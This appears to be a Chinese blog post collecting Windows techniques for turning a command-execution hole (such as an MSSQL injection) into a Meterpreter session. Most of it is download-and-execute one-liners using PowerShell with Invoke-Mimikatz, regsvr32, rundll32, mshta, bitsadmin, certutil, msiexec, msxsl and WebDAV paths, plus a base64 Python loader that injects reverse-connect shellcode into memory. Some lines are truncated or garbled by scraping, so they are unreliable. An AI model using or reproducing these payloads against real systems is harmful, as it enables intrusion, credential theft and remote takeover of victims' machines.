luda 如果经常遇到命令执行漏洞,例如Mssql注入点的命令执行,如何获得meterpreter?此时,你需要找到获得它的方法,命令行执行远程命令的方法发生了很多,但如果使用的话,总是记不住,所以这里总结一下,也许那个方法能帮助你。
(当然,我们这里不说可以直接echo webshell的情形)1、powershell
eg:
帮助
1powershell IEX (New-Object NET.WebClient).DownloadString(';);Invoke-Mimikatz2、regsvr32
eg:
帮助
1regsvr32 /u /s /i:http://site.com/js.png js.png
帮助
1234<?XML version="1.0"?><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-wp-preserve="%3Cscriptlet%3E%0A%3Cregistration%20progid%3D%22ShortJSRAT%22%20classid%3D%22%7B10001111-0000-0000-0000-0000FEEDACDC%7D%22%20%3E%0A%20%20%20%20%3C!--%20Learn%20from%20Casey%20Smith%20%40subTee%20--%3E%0A%20%20%20%20%3Cscript%20language%3D%22JScript%22%3E%0A%20%20%20%20%20%20%20%20%3C!%5BCDATA%5B%20ps%20%3D%20%22cmd.exe%20%2Fc%20calc.exe%22%3B%20new%20ActiveXObject(%22WScri).Run(ps%2C0%2Ctrue)%3B%20%5D%5D%3E%0A%3C%2Fscript%3E" data-mce-resize="false" data-mce-placeholder="1" class="mce-object" width="20" height="20" alt="<script>" title="<script>" /></registration></scriptlet>3、rundll32
eg:
帮助
1rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinH;);h.Open("GET",";,false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScri;).Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%4、mshta
eg:
帮助
12mshta mshta vbscript:Close(Execute("GetObject(""script:http://webserver;")"))calc.hta
帮助
123456789<HTML> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"><HEAD> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-wp-preserve="%3Cscript%20language%3D%22VBScript%22%3E%0AWindow.ReSizeTo%200%2C%200%0AWindow.moveTo%20-2000%2C-2000%0ASet%20objShell%20%3D%20CreateObject(%22Wscri)%0AobjS; data-mce-resize="false" data-mce-placeholder="1" class="mce-object" width="20" height="20" alt="<script>" title="<script>" /><body>demo</body></HEAD> </HTML> 5、
eg:
帮助
1cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\ 127.0.0.1 scri6、bitsadmin
eg:
帮助
1cmd.exe /c bitsadmin /transfer d90f %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe7、python(需安装)
eg:
帮助
1python -c "import urllib2; exec urllib2.urlopen('bc').read();"abc帮助
1import base64; exec ba("aW1wb3J0IGN0eXBlcwppbXBvcnQgcGxhdGZvcm0KCihhcmNoLCB0eXBlKSA9IHBsYXRmb3JtLmFyY2hpdGVjdHVyZSgpCgojIDMyLWJpdCBQeXRob24KaWYgYXJjaCA9PSAiMzJiaXQiOgoJc2hlbGxjb2RlID0gIlx4ZmNceGU4XHg4OVx4MDBceDAwXHgwMFx4NjBceDg5XHhlNVx4MzFceGQyXHg2NFx4OGJceDUyXHgzMFx4OGJceDUyXHgwY1x4OGJceDUyXHgxNFx4OGJceDcyXHgyOFx4MGZceGI3XHg0YVx4MjZceDMxXHhmZlx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4YzFceGNmXHgwZFx4MDFceGM3XHhlMlx4ZjBceDUyXHg1N1x4OGJceDUyXHgxMFx4OGJceDQyXHgzY1x4MDFceGQwXHg4Ylx4NDBceDc4XHg4NVx4YzBceDc0XHg0YVx4MDFceGQwXHg1MFx4OGJceDQ4XHgxOFx4OGJceDU4XHgyMFx4MDFceGQzXHhlM1x4M2NceDQ5XHg4Ylx4MzRceDhiXHgwMVx4ZDZceDMxXHhmZlx4MzFceGMwXHhhY1x4YzFceGNmXHgwZFx4MDFceGM3XHgzOFx4ZTBceDc1XHhmNFx4MDNceDdkXHhmOFx4M2JceDdkXHgyNFx4NzVceGUyXHg1OFx4OGJceDU4XHgyNFx4MDFceGQzXHg2Nlx4OGJceDBjXHg0Ylx4OGJceDU4XHgxY1x4MDFceGQzXHg4Ylx4MDRceDhiXHgwMVx4ZDBceDg5XHg0NFx4MjRceDI0XHg1Ylx4NWJceDYxXHg1OVx4NWFceDUxXHhmZlx4ZTBceDU4XHg1Zlx4NWFceDhiXHgxMlx4ZWJceDg2XHg1ZFx4NjhceDZlXHg2NVx4NzRceDAwXHg2OFx4NzdceDY5XHg2ZVx4NjlceDU0XHg2OFx4NGNceDc3XHgyNlx4MDdceGZmXHhkNVx4ZThceDgwXHgwMFx4MDBceDAwXHg0ZFx4NmZceDdhXHg2OVx4NmNceDZjXHg2MVx4MmZceDM1XHgyZVx4MzBceDIwXHgyOFx4NjNceDZmXHg2ZFx4NzBceDYxXHg3NFx4NjlceDYyXHg2Y1x4NjVceDNiXHgyMFx4NGRceDUzXHg0OVx4NDVceDIwXHgzOVx4MmVceDMwXHgzYlx4MjBceDU3XHg2OVx4NmVceDY0XHg2Zlx4NzdceDczXHgyMFx4NGVceDU0XHgyMFx4MzZceDJlXHgzMVx4M2JceDIwXHg1N1x4NGZceDU3XHgzNlx4MzRceDNiXHgyMFx4NTRceDcyXHg2OVx4NjRceDY1XHg2ZVx4NzRceDJmXHgzNVx4MmVceDMwXHgzYlx4MjBceDQyXHg0Zlx4NDlceDQ1XHgzOVx4M2JceDQ1XHg0ZVx4NTVceDUzXHg0ZFx4NTNceDQ1XHgyOVx4MDBceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4MDBceDU5XHgzMVx4ZmZceDU3XHg1N1x4NTdceDU3XHg1MVx4NjhceDNhXHg1Nlx4NzlceGE3XHhmZlx4ZDVceGViXHg3OVx4NWJceDMxXHhjOVx4NTFceDUxXHg2YVx4MDNceDUxXHg1MVx4NjhceGI4XHgyMlx4MDBceDAwXHg1M1x4NTBceDY4XHg1N1x4ODlceDlmXHhjNlx4ZmZceGQ1XHhlYlx4NjJceDU5XHgzMVx4ZDJceDUyXHg2OFx4MDBceDAyXHg2MFx4ODRceDUyXHg1Mlx4NTJceDUxXHg1Mlx4NTBceDY4XHhlYlx4NTVceDJlXHgzYlx4ZmZceGQ1XHg4OVx4YzZceDMxXHhmZlx4NTdceDU3XHg1N1x4NTdceDU2XHg2OFx4MmRceDA2XHgxOFx4N2JceGZmXHhkNVx4ODVceGMwXHg3NFx4NDRceDMxXHhmZlx4ODVceGY2XHg3NFx4MDRceDg5XHhmOVx4ZWJceDA5XHg2OFx4YWFceGM1XHhlMlx4NWRceGZmXHhkNVx4ODlceGMxXHg2OFx4NDVceDIxXHg1ZVx4MzFceGZmXHhkNVx4MzFceGZmXHg1N1x4NmFceDA3XHg1MVx4NTZceDUwXHg2OFx4YjdceDU3XHhlMFx4MGJceGZmXHhkNVx4YmZceDAwXHgyZlx4MDBceDAwXHgzOVx4YzdceDc0XHhiY1x4MzFceGZmXHhlYlx4MTVceGViXHg0OVx4ZThceDk5XHhmZlx4ZmZceGZmXHgyZlx4NTJceDYyXHg0Nlx4NjJceDAwXHgwMFx4NjhceGYwXHhiNVx4YTJceDU2XHhmZlx4ZDVceDZhXHg0MFx4NjhceDAwXHgxMFx4MDBceDAwXHg2OFx4MDBceDAwXHg0MFx4MDBceDU3XHg2OFx4NThceGE0XHg1M1x4ZTVceGZmXHhkNVx4OTNceDUzXHg1M1x4ODlceGU3XHg1N1x4NjhceDAwXHgyMFx4MDBceDAwXHg1M1x4NTZceDY4XHgxMlx4OTZceDg5XHhlMlx4ZmZceGQ1XHg4NVx4YzBceDc0XHhjZFx4OGJceDA3XHgwMVx4YzNceDg1XHhjMFx4NzVceGU1XHg1OFx4YzNceGU4XHgzN1x4ZmZceGZmXHhmZlx4MzFceDMwXHgzM1x4MmVceDMyXHgzM1x4MzhceDJlXHgzMlx4MzJceDM1XHgyZVx4MzFceDMyXHgzOVx4MDAiCgojIDY0LWJpdCBQeXRob24KZWxpZiBhcmNoID09ICI2NGJpdCI6CglzaGVsbGNvZGUgPSAiXHhmY1x4NDhceDgzXHhlNFx4ZjBceGU4XHhjOFx4MDBceDAwXHgwMFx4NDFceDUxXHg0MVx4NTBceDUyXHg1MVx4NTZceDQ4XHgzMVx4ZDJceDY1XHg0OFx4OGJceDUyXHg2MFx4NDhceDhiXHg1Mlx4MThceDQ4XHg4Ylx4NTJceDIwXHg0OFx4OGJceDcyXHg1MFx4NDhceDBmXHhiN1x4NGFceDRhXHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceGUyXHhlZFx4NTJceDQxXHg1MVx4NDhceDhiXHg1Mlx4MjBceDhiXHg0Mlx4M2NceDQ4XHgwMVx4ZDBceDY2XHg4MVx4NzhceDE4XHgwYlx4MDJceDc1XHg3Mlx4OGJceDgwXHg4OFx4MDBceDAwXHgwMFx4NDhceDg1XHhjMFx4NzRceDY3XHg0OFx4MDFceGQwXHg1MFx4OGJceDQ4XHgxOFx4NDRceDhiXHg0MFx4MjBceDQ5XHgwMVx4ZDBceGUzXHg1Nlx4NDhceGZmXHhjOVx4NDFceDhiXHgzNFx4ODhceDQ4XHgwMVx4ZDZceDRkXHgzMVx4YzlceDQ4XHgzMVx4YzBceGFjXHg0MVx4YzFceGM5XHgwZFx4NDFceDAxXHhjMVx4MzhceGUwXHg3NVx4ZjFceDRjXHgwM1x4NGNceDI0XHgwOFx4NDVceDM5XHhkMVx4NzVceGQ4XHg1OFx4NDRceDhiXHg0MFx4MjRceDQ5XHgwMVx4ZDBceDY2XHg0MVx4OGJceDBjXHg0OFx4NDRceDhiXHg0MFx4MWNceDQ5XHgwMVx4ZDBceDQxXHg4Ylx4MDRceDg4XHg0OFx4MDFceGQwXHg0MVx4NThceDQxXHg1OFx4NWVceDU5XHg1YVx4NDFceDU4XHg0MVx4NTlceDQxXHg1YVx4NDhceDgzXHhlY1x4MjBceDQxXHg1Mlx4ZmZceGUwXHg1OFx4NDFceDU5XHg1YVx4NDhceDhiXHgxMlx4ZTlceDRmXHhmZlx4ZmZceGZmXHg1ZFx4NmFceDAwXHg0OVx4YmVceDc3XHg2OVx4NmVceDY5XHg2ZVx4NjVceDc0XHgwMFx4NDFceDU2XHg0OVx4ODlceGU2XHg0Y1x4ODlceGYxXHg0MVx4YmFceDRjXHg3N1x4MjZceDA3XHhmZlx4ZDVceGU4XHg4MFx4MDBceDAwXHgwMFx4NGRceDZmXHg3YVx4NjlceDZjXHg2Y1x4NjFceDJmXHgzNVx4MmVceDMwXHgyMFx4MjhceDYzXHg2Zlx4NmRceDcwXHg2MVx4NzRceDY5XHg2Mlx4NmNceDY1XHgzYlx4MjBceDRkXHg1M1x4NDlceDQ1XHgyMFx4MzlceDJlXHgzMFx4M2JceDIwXHg1N1x4NjlceDZlXHg2NFx4NmZceDc3XHg3M1x4MjBceDRlXHg1NFx4MjBceDM2XHgyZVx4MzFceDNiXHgyMFx4NTdceDRmXHg1N1x4MzZceDM0XHgzYlx4MjBceDU0XHg3Mlx4NjlceDY0XHg2NVx4NmVceDc0XHgyZlx4MzVceDJlXHgzMFx4M2JceDIwXHg0Mlx4NGZceDQ5XHg0NVx4MzlceDNiXHg0NVx4NGVceDU1XHg1M1x4NGRceDUzXHg0NVx4MjlceDAwXHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDAwXHg1OVx4NDhceDMxXHhkMlx4NGRceDMxXHhjMFx4NGRceDMxXHhjOVx4NDFceDUwXHg0MVx4NTBceDQxXHhiYVx4M2FceDU2XHg3OVx4YTdceGZmXHhkNVx4ZWJceDYxXHg1YVx4NDhceDg5XHhjMVx4NDFceGI4XHhiOFx4MjJceDAwXHgwMFx4NGRceDMxXHhjOVx4NDFceDUxXHg0MVx4NTFceDZhXHgwM1x4NDFceDUxXHg0MVx4YmFceDU3XHg4OVx4OWZceGM2XHhmZlx4ZDVceGViXHg0NFx4NDhceDg5XHhjMVx4NDhceDMxXHhkMlx4NDFceDU4XHg0ZFx4MzFceGM5XHg1Mlx4NjhceDAwXHgwMlx4NjBceDg0XHg1Mlx4NTJceDQxXHhiYVx4ZWJceDU1XHgyZVx4M2JceGZmXHhkNVx4NDhceDg5XHhjNlx4NmFceDBhXHg1Zlx4NDhceDg5XHhmMVx4NDhceDMxXHhkMlx4NGRceDMxXHhjMFx4NGRceDMxXHhjOVx4NTJceDUyXHg0MVx4YmFceDJkXHgwNlx4MThceDdiXHhmZlx4ZDVceDg1XHhjMFx4NzVceDFkXHg0OFx4ZmZceGNmXHg3NFx4MTBceGViXHhkZlx4ZWJceDYzXHhlOFx4YjdceGZmXHhmZlx4ZmZceDJmXHg2Ylx4NTRceDQ4XHg1Nlx4MDBceDAwXHg0MVx4YmVceGYwXHhiNVx4YTJceDU2XHhmZlx4ZDVceDQ4XHgzMVx4YzlceGJhXHgwMFx4MDBceDQwXHgwMFx4NDFceGI4XHgwMFx4MTBceDAwXHgwMFx4NDFceGI5XHg0MFx4MDBceDAwXHgwMFx4NDFceGJhXHg1OFx4YTRceDUzXHhlNVx4ZmZceGQ1XHg0OFx4OTNceDUzXHg1M1x4NDhceDg5XHhlN1x4NDhceDg5XHhmMVx4NDhceDg5XHhkYVx4NDFceGI4XHgwMFx4MjBceDAwXHgwMFx4NDlceDg5XHhmOVx4NDFceGJhXHgxMlx4OTZceDg5XHhlMlx4ZmZceGQ1XHg0OFx4ODNceGM0XHgyMFx4ODVceGMwXHg3NFx4YjZceDY2XHg4Ylx4MDdceDQ4XHgwMVx4YzNceDg1XHhjMFx4NzVceGQ3XHg1OFx4NThceGMzXHhlOFx4MzVceGZmXHhmZlx4ZmZceDMxXHgzMFx4MzNceDJlXHgzMlx4MzNceDM4XHgyZVx4MzJceDMyXHgzNVx4MmVceDMxXHgzMlx4MzlceDAwIiAKZWxzZToKCXNoZWxsY29kZSA9ICIiCgojIHNhbml0eSBjaGVjayBvdXIgc2l0dWF0aW9uCmlmIHR5cGUgIT0gIldpbmRvd3NQRSIgb3IgbGVuKHNoZWxsY29kZSkgPT0gMDoKCXF1aXQoKQoKIyBpbmplY3Qgb3VyIHNoZWxsY29kZQpyd3hwYWdlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoMCwgbGVuKHNoZWxsY29kZSksIDB4MTAwMCwgMHg0MCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSkKaGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoMCwgMCwgcnd4cGFnZSwgMCwgMCwgMCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGhhbmRsZSwgLTEpCg==")8、certutil
eg:
帮助
1certutil -urlcache -split -f a.exe && a.exe && del a.exe && certutil -urlcache -split -f delete9、msiexec
帮助
1msiexec /q /i calc.png
帮助
1msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png10、m(需下载)
eg:
帮助
1msxsl demo.xml
帮助
1234567<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="exec.xsl" ?><customers><customer><name>Microsoft</name></customer></customers>exec.xsl
帮助
0102030405060708091011121314<?xml version='1.0'?><xsl:stylesheet version="1.0" xmlns:xsl="; xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user=";><msxsl:script language="JScript" implements-prefix="user"> function xml(nodelist) {var r = new ActiveXObject("WScri;).Run("cmd /c calc.exe"); return nodeli().xml; }</msxsl:script><xsl:template match="/"> <xsl:value-of select="user:xml(.)"/></xsl:template></xsl:stylesheet>11、IEExec
eg:
帮助
12C:\Windows\Micro\Framework\v2.0.50727\> caspol -s offC:\Windows\Micro\Framework\v2.0.50727\> IEExec 12、IEXPLORE.EXE
这个需要IE存在可执行命令的漏洞
eg:
帮助
1"C:\Program Files\Internet Explorer\IEXPLORE.EXE" exp可以使用类似ms14_064
13、当使用UNC/WebDAV时候多的几种姿势
Cmd
帮助
1cmd.exe /k < \\webdavserver\folder\baCscript/Wscript
帮助
1cscript //E:jscript \\webdavserver\folder\Regasm/Regsvc
帮助
1C:\Windows\Micro\Framework64\v4.0.30319\rega /u \\webdavserver\folder\dll 可以使用C#写的
Msbuild
帮助
1cmd /V /c "set MB="C:\Windows\Micro\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\ > & !MB! "帮助
1 -a \\server\方式应该还有很多,欢迎留言补充!!